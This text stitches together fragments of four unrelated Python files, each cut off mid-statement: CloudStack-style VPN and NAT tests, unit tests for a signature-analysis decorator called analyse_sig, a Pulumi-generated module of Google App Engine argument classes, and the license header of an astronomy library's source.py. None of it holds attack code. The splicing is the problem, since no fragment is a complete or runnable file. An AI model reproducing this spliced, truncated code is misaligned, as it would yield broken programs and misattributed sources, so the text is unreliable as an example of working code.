self.assertEqual(isinstance(nat_rules, list), True, "List NAT rules should return a valid response") self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) with self.assertRaises(Exception): self.create_VPN(self.public_ip) self.debug("Create VPN connection failed! Test successful!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_03_enable_vpn_use_port(self): """Test create NAT rule when VPN when L2TP enabled""" # Validate the following # 1. Enable a VPN connection on source NAT # 2. Add a VPN user # 3. add a port forward rule for UDP port 1701. Should result in error # saying that VPN is enabled over port 1701 self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Creating a port forwarding rule on port 1701") # Create NAT rule with self.assertRaises(Exception): NATRule.create( self.apiclient, self.virtual_machine, self.services["natrule"], self.public_ip.ipaddress.id) self.debug("Create NAT rule failed! Test successful!") return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_04_add_new_users(self): """Test add new users to existing VPN""" # Validate the following # 1. Enable a VPN connection on source NAT # 2. Add new user to VPN when there are already existing users. # 3. We should be able to successfully establish a VPN connection using # the newly added user credential. self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) try: self.debug("Adding new VPN user to account: %s" % self.account.name) self.create_VPN_Users() # TODO: Verify the VPN connection self.debug("Adding another user to account") self.create_VPN_Users() # TODO: Verify the VPN connection with new user except Exception as e: self.fail("Failed to create new VPN user: %s" % e) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_05_add_duplicate_user(self): """Test add duplicate user to existing VPN""" # Validate the following # 1. Enable a VPN connection on source NAT # 2. Add a VPN user say "abc" that already an added user to the VPN. # 3. Adding this VPN user should fail. self.debug("Enabling the VPN connection for IP: %s" % self.public_ip.ipaddress) self.create_VPN(self.public_ip) self.debug("Adding new VPN user to account: %s" % self.account.name) self.create_VPN_Users(rand_name=False) # TODO: Verify the VPN connection self.debug("Adding another user to account with same username") with self.assertRaises(Exception): self.create_VPN_Users(rand_name=False) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def test_06_add_VPN_user_global_admin(self): """Test as global admin, add a new VPN user to an existing VPN entry that was created by another account.""" # Steps for verification # 1. Create a new user and deploy few Vms. # 2. Enable VPN access. Add few VPN users. # 3. Make sure that VPN access works as expected. # 4. As global Admin , add VPN user to this user's existing VPN entry. # Validate the following # 1. The newly added VPN user should get configured to the router of # user account. # 2. We should be able to use this newly created user credential to # establish VPN connection that will give access all VMs of this user self.debug("Enabling VPN connection to account: %s" % self.account.name) self.create_VPN(self.public_ip) self.debug("Creating VPN user for the account: %s" % self.account.name) self.create_VPN_Users() self.debug("Creating a global admin account") admin = Account.create(self.apiclient, self.services["account"], admin=True, domainid=self.account.domainid) self.cleanup.append(admin) self.debug("Creating API client for newly created user") api_client = self.testClient.getUserApiClient( UserName=self.account.name, DomainName=self.account.domain) self.debug("Adding new user to VPN as a global admin: %s" % admin.name) try: self.create_VPN_Users(api_client=api_client) except Exception as e: self.fail("Global admin should be allowed to create VPN user: %s" % e) return @attr(tags=["advanced", "advancedns"], required_hardware="false") def
#!/usr/bin/env python # -*- coding: latin-1 -*- # from __future__ import print_function import unittest from mock import Mock from hoft import ArgsNotAnalysedError, IGNORE, KeywordError, NOVALUE, NotAnalysedError, \ PositionalError, analyse_sig from tests.helpers import check_calls class _Success(Exception): pass class _Error(Exception): pass class AnalyseSigNoDefaultTestCase(unittest.TestCase): def setUp(self): self._f_a = Mock() self._f_c = Mock() self._f_f = Mock() self._f_on_error = Mock() def tearDown(self): pass def test_analyse_sig_strict_with_on_error_handler_no_errors(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print('f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() self.assertRaises(_Success, voo, 11, 22, 33, 44, e=99) self._f_on_error.assert_called_once() cargs = self._f_on_error.call_args_list[0][0] self.assertIsInstance(cargs[0], ArgsNotAnalysedError) self.assertEqual(set(cargs[0].names), set(['b', 'e', 'g', 'kwargs'])) self.assertEqual(len(cargs[1]), 1) self.assertIsInstance(cargs[1][0], NotAnalysedError) self.assertEqual(set(cargs[1][0].name), set(['b', 'e', 'g', 'kwargs'])) self.assertIs(cargs[1][0].error, cargs[0]) self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) def test_analyse_sig_strict_without_on_error_handler_fail_slow_no_errors(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print( # 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, # _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except ArgsNotAnalysedError as e: self.assertEqual(set(e.names), set(['b', 'e', 'g', 'kwargs'])) errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) error = errors[0] self.assertIsInstance(error, NotAnalysedError) self.assertIsInstance(error.error, ArgsNotAnalysedError) self.assertEqual(set(error.name), set(['b', 'e', 'g', 'kwargs'])) self.assertDictEqual( { 'a': 11, 'b': 22, 'c': 33, 'd': 44, 'e': 99, 'f': '2', 'g': {3: 4}, 'kwargs': {}, }, error.callargs) print(error.callargs) self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_without_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) # print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) # print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) # print( # 'f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( # name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) # print('f_on_error exc: {0}'.format(str(exc))) # print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 4) # print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) self.assertEqual(error.name, 'a') self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.value, 11) self.assertEqual(error.index, 0) self.assertIsInstance(error.error, _Error) self.assertEqual(error.error.message, 'a') self.assertEqual(len(error.error._errors_), 4) error = errors[1] self.assertIsInstance(error, PositionalError) self.assertEqual(error.name, 'c') self.assertEqual(error.func_name, 'f_c') self.assertEqual(error.value, 33) self.assertEqual(error.index, 2) self.assertIsInstance(error.error, _Error) self.assertEqual(error.error.message, 'c') error = errors[2] self.assertIsInstance(error, KeywordError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'f') self.assertEqual(error.func_name, 'f_f') self.assertEqual(error.value, NOVALUE) self.assertEqual(error.error.message, 'f') self.assertEqual(error.name, 'f') self.assertEqual(error.default_value, '2') error = errors[3] self.assertIsInstance(error, NotAnalysedError) self.assertEqual(set(error.name), set(['b', 'e', 'g', 'kwargs'])) self.assertIsInstance(error.error, ArgsNotAnalysedError) self.assertEqual(set(error.error.names), set(['b', 'e', 'g', 'kwargs'])) self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_without_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_f: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.name, 'a') self.assertEqual(error.value, 11) self.assertIsInstance(error.error, _Error) self._f_on_error.assert_not_called() self._f_f.assert_not_called() self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_with_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'on_error') self.assertEqual(self._f_on_error.call_count, 1) self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_strict_with_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self.f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _on_error_=f_on_error, _strict_=True, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'on_error') self.assertEqual(self._f_on_error.call_count, 1) cargs = self._f_on_error.call_args_list[0][0] self.assertIsInstance(cargs[0], _Error) self.assertEqual(cargs[0].message, 'a') self.assertEqual(len(cargs[1]), 1) err = cargs[1][0] self.assertIsInstance(err, PositionalError) self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) self._f_f.assert_not_called() self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_not_strict_without_on_error_handler_fail_fast(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=True, _strict_=False, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 1) print('errors: {0}'.format(errors)) err = errors[0] self.assertIsInstance(err, PositionalError) self.assertIsInstance(err.error, _Error) self.assertEqual(err.error.message, 'a') self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) self._f_f.assert_not_called() self._f_c.assert_not_called() self._f_a.assert_called_once_with('a', 0, 11) else: assert False def test_analyse_sig_not_strict_without_on_error_handler_fail_slow(self): def f_a(name, index, value): self._f_a(name, index, value) print('f_a: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('a') def f_c(name, index, value): self._f_c(name, index, value) print('f_c: name: {0}, index:{1}, value: {2}'.format(name, index, value)) raise _Error('c') def f_f(name, index, called_with_value, default_value): self._f_f(name, index, called_with_value, default_value) print( 'f_c: name: {0}, index:{1}, called_with_value: {2}, default_value: {3}'.format( name, index, called_with_value, default_value)) raise _Error('f') def f_on_error(exc, errors): self._f_on_error(exc, errors) print('f_on_error exc: {0}'.format(str(exc))) print('f_on_error errors: {0}'.format(str(errors))) raise _Error('on_error') @analyse_sig( f_a, IGNORE, f_c, c=IGNORE, d=IGNORE, f=f_f, _fail_fast_=False, _strict_=False, ) def voo(a, b, c, d, e=1, f='2', g={3: 4}, **kwargs): raise _Success() try: voo(11, 22, 33, 44, e=99) except _Error as e: self.assertEqual(e.message, 'a') self.assertEqual(self._f_on_error.call_count, 0) errors = e._errors_ self.assertIsInstance(errors, list) self.assertEqual(len(errors), 3) print('errors: {0}'.format(errors)) err = errors[0] self.assertIsInstance(err, PositionalError) self.assertIsInstance(err.error, _Error) self.assertEqual(err.error.message, 'a') self.assertEqual(err.func_name, 'f_a') self.assertEqual(err.index, 0) self.assertEqual(err.name, 'a') self.assertEqual(err.value, 11) print('errors: {0}'.format(errors)) error = errors[0] self.assertIsInstance(error, PositionalError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'a') self.assertEqual(error.value, 11) self.assertEqual(error.func_name, 'f_a') self.assertEqual(error.func, f_a) self.assertEqual(error.error.message, 'a') error = errors[1] self.assertIsInstance(error, PositionalError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'c') self.assertEqual(error.value, 33) self.assertEqual(error.func_name, 'f_c') self.assertEqual(error.func, f_c) self.assertEqual(error.error.message, 'c') error = errors[2] self.assertIsInstance(error, KeywordError) self.assertIsInstance(error.error, _Error) self.assertEqual(error.name, 'f') self.assertEqual(error.value, NOVALUE) self.assertEqual(error.func_name, 'f_f') self.assertEqual(error.func, f_f) self.assertEqual(error.error.message, 'f') self.assertEqual(error.default_value, '2') self._f_on_error.assert_not_called() self._f_f.assert_called_once_with('f', 5, NOVALUE, '2') self._f_c.assert_called_once_with('c', 2, 33) self._f_a.assert_called_once_with('a',
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__ = [ 'ApplicationFeatureSettingsArgs', 'ApplicationIapArgs', 'ApplicationUrlDispatchRuleArgs', 'ApplicationUrlDispatchRulesDispatchRuleArgs', 'DomainMappingResourceRecordArgs', 'DomainMappingSslSettingsArgs', 'EngineSplitTrafficSplitArgs', 'FlexibleAppVersionApiConfigArgs', 'FlexibleAppVersionAutomaticScalingArgs', 'FlexibleAppVersionAutomaticScalingCpuUtilizationArgs', 'FlexibleAppVersionAutomaticScalingDiskUtilizationArgs', 'FlexibleAppVersionAutomaticScalingNetworkUtilizationArgs', 'FlexibleAppVersionAutomaticScalingRequestUtilizationArgs', 'FlexibleAppVersionDeploymentArgs', 'FlexibleAppVersionDeploymentCloudBuildOptionsArgs', 'FlexibleAppVersionDeploymentContainerArgs', 'FlexibleAppVersionDeploymentFileArgs', 'FlexibleAppVersionDeploymentZipArgs', 'FlexibleAppVersionEndpointsApiServiceArgs', 'FlexibleAppVersionEntrypointArgs', 'FlexibleAppVersionHandlerArgs', 'FlexibleAppVersionHandlerScriptArgs', 'FlexibleAppVersionHandlerStaticFilesArgs', 'FlexibleAppVersionLivenessCheckArgs', 'FlexibleAppVersionManualScalingArgs', 'FlexibleAppVersionNetworkArgs', 'FlexibleAppVersionReadinessCheckArgs', 'FlexibleAppVersionResourcesArgs', 'FlexibleAppVersionResourcesVolumeArgs', 'FlexibleAppVersionVpcAccessConnectorArgs', 'StandardAppVersionAutomaticScalingArgs', 'StandardAppVersionAutomaticScalingStandardSchedulerSettingsArgs', 'StandardAppVersionBasicScalingArgs', 'StandardAppVersionDeploymentArgs', 'StandardAppVersionDeploymentFileArgs', 'StandardAppVersionDeploymentZipArgs', 'StandardAppVersionEntrypointArgs', 'StandardAppVersionHandlerArgs', 'StandardAppVersionHandlerScriptArgs', 'StandardAppVersionHandlerStaticFilesArgs', 'StandardAppVersionLibraryArgs', 'StandardAppVersionManualScalingArgs', 'StandardAppVersionVpcAccessConnectorArgs', ] @pulumi.input_type class ApplicationFeatureSettingsArgs: def __init__(__self__, *, split_health_checks: pulumi.Input[bool]): """ :param pulumi.Input[bool] split_health_checks: Set to false to use the legacy health check instead of the readiness and liveness checks. """ pulumi.set(__self__, "split_health_checks", split_health_checks) @property @pulumi.getter(name="splitHealthChecks") def split_health_checks(self) -> pulumi.Input[bool]: """ Set to false to use the legacy health check instead of the readiness and liveness checks. """ return pulumi.get(self, "split_health_checks") @split_health_checks.setter def split_health_checks(self, value: pulumi.Input[bool]): pulumi.set(self, "split_health_checks", value) @pulumi.input_type class ApplicationIapArgs: def __init__(__self__, *, oauth2_client_id: pulumi.Input[str], oauth2_client_secret: pulumi.Input[str], enabled: Optional[pulumi.Input[bool]] = None, oauth2_client_secret_sha256: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] oauth2_client_id: OAuth2 client ID to use for the authentication flow. :param pulumi.Input[str] oauth2_client_secret: OAuth2 client secret to use for the authentication flow. The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. :param pulumi.Input[str] oauth2_client_secret_sha256: Hex-encoded SHA-256 hash of the client secret. """ pulumi.set(__self__, "oauth2_client_id", oauth2_client_id) pulumi.set(__self__, "oauth2_client_secret", oauth2_client_secret) if enabled is not None: pulumi.set(__self__, "enabled", enabled) if oauth2_client_secret_sha256 is not None: pulumi.set(__self__, "oauth2_client_secret_sha256", oauth2_client_secret_sha256) @property @pulumi.getter(name="oauth2ClientId") def oauth2_client_id(self) -> pulumi.Input[str]: """ OAuth2 client ID to use for the authentication flow. """ return pulumi.get(self, "oauth2_client_id") @oauth2_client_id.setter def oauth2_client_id(self, value: pulumi.Input[str]): pulumi.set(self, "oauth2_client_id", value) @property @pulumi.getter(name="oauth2ClientSecret") def oauth2_client_secret(self) -> pulumi.Input[str]: """ OAuth2 client secret to use for the authentication flow. The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. """ return pulumi.get(self, "oauth2_client_secret") @oauth2_client_secret.setter def oauth2_client_secret(self, value: pulumi.Input[str]): pulumi.set(self, "oauth2_client_secret", value) @property @pulumi.getter def enabled(self) -> Optional[pulumi.Input[bool]]: return pulumi.get(self, "enabled") @enabled.setter def enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "enabled", value) @property @pulumi.getter(name="oauth2ClientSecretSha256") def oauth2_client_secret_sha256(self) -> Optional[pulumi.Input[str]]: """ Hex-encoded SHA-256 hash of the client secret. """ return pulumi.get(self, "oauth2_client_secret_sha256") @oauth2_client_secret_sha256.setter def oauth2_client_secret_sha256(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "oauth2_client_secret_sha256", value) @pulumi.input_type class ApplicationUrlDispatchRuleArgs: def __init__(__self__, *, domain: Optional[pulumi.Input[str]] = None, path: Optional[pulumi.Input[str]] = None, service: Optional[pulumi.Input[str]] = None): if domain is not None: pulumi.set(__self__, "domain", domain) if path is not None: pulumi.set(__self__, "path", path) if service is not None: pulumi.set(__self__, "service", service) @property @pulumi.getter def domain(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "domain") @domain.setter def domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "domain", value) @property @pulumi.getter def path(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "path") @path.setter def path(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "path", value) @property @pulumi.getter def service(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "service") @service.setter def service(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "service", value) @pulumi.input_type class ApplicationUrlDispatchRulesDispatchRuleArgs: def __init__(__self__, *, path: pulumi.Input[str], service: pulumi.Input[str], domain: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] path: Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. :param pulumi.Input[str] service: Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. :param pulumi.Input[str] domain: Domain name to match against. The wildcard "*" is supported if specified before a period: "*.". Defaults to matching all domains: "*". """ pulumi.set(__self__, "path", path) pulumi.set(__self__, "service", service) if domain is not None: pulumi.set(__self__, "domain", domain) @property @pulumi.getter def path(self) -> pulumi.Input[str]: """ Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. """ return pulumi.get(self, "path") @path.setter def path(self, value: pulumi.Input[str]): pulumi.set(self, "path", value) @property @pulumi.getter def service(self) -> pulumi.Input[str]: """ Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. """ return pulumi.get(self, "service") @service.setter def service(self, value: pulumi.Input[str]): pulumi.set(self, "service", value) @property @pulumi.getter def domain(self) -> Optional[pulumi.Input[str]]: """ Domain name to match against. The wildcard "*" is supported if specified before a period: "*.". Defaults to matching all domains: "*". """ return pulumi.get(self, "domain") @domain.setter def domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "domain", value) @pulumi.input_type class DomainMappingResourceRecordArgs: def __init__(__self__, *, name: Optional[pulumi.Input[str]] = None, rrdata: Optional[pulumi.Input[str]] = None, type: Optional[pulumi.Input[str]] = None): if name is not None: pulumi.set(__self__, "name", name) if rrdata is not None: pulumi.set(__self__, "rrdata", rrdata) if type is not None: pulumi.set(__self__, "type", type) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter def rrdata(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "rrdata") @rrdata.setter def rrdata(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "rrdata", value) @property @pulumi.getter def type(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "type") @type.setter def type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "type", value) @pulumi.input_type class DomainMappingSslSettingsArgs: def __init__(__self__, *, ssl_management_type: pulumi.Input[str], certificate_id: Optional[pulumi.Input[str]] = None, pending_managed_certificate_id: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[str] ssl_management_type: SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are `AUTOMATIC` and `MANUAL`. :param pulumi.Input[str] certificate_id: ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345. :param pulumi.Input[str] pending_managed_certificate_id: - ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request. """ pulumi.set(__self__, "ssl_management_type", ssl_management_type) if certificate_id is not None: pulumi.set(__self__, "certificate_id", certificate_id) if pending_managed_certificate_id is not None: pulumi.set(__self__, "pending_managed_certificate_id", pending_managed_certificate_id) @property @pulumi.getter(name="sslManagementType") def ssl_management_type(self) -> pulumi.Input[str]: """ SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are `AUTOMATIC` and `MANUAL`. """ return pulumi.get(self, "ssl_management_type") @ssl_management_type.setter def ssl_management_type(self, value: pulumi.Input[str]): pulumi.set(self, "ssl_management_type", value) @property @pulumi.getter(name="certificateId") def certificate_id(self) -> Optional[pulumi.Input[str]]: """ ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345. """ return pulumi.get(self, "certificate_id") @certificate_id.setter def certificate_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "certificate_id", value) @property @pulumi.getter(name="pendingManagedCertificateId") def pending_managed_certificate_id(self) -> Optional[pulumi.Input[str]]: """ - ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request. """ return pulumi.get(self, "pending_managed_certificate_id") @pending_managed_certificate_id.setter def pending_managed_certificate_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "pending_managed_certificate_id", value) @pulumi.input_type class EngineSplitTrafficSplitArgs: def __init__(__self__, *, allocations: pulumi.Input[Mapping[str, pulumi.Input[str]]], shard_by: Optional[pulumi.Input[str]] = None): """ :param pulumi.Input[Mapping[str, pulumi.Input[str]]] allocations: Mapping from version IDs within the
<reponame>musevlt/mpdaf<filename>lib/mpdaf/sdetect/source.py """ Copyright (c) 2010-2018 CNRS / Centre de Recherche Astrophysique de Lyon Copyright (c) 2015-2017 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2015-2019 <NAME> <<EMAIL>> Copyright (c) 2016 <NAME> <<EMAIL>> Copyright (c) 2018-2019 <NAME> <<EMAIL>> Copyright (c) 2018 <NAME> <<EMAIL>> All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 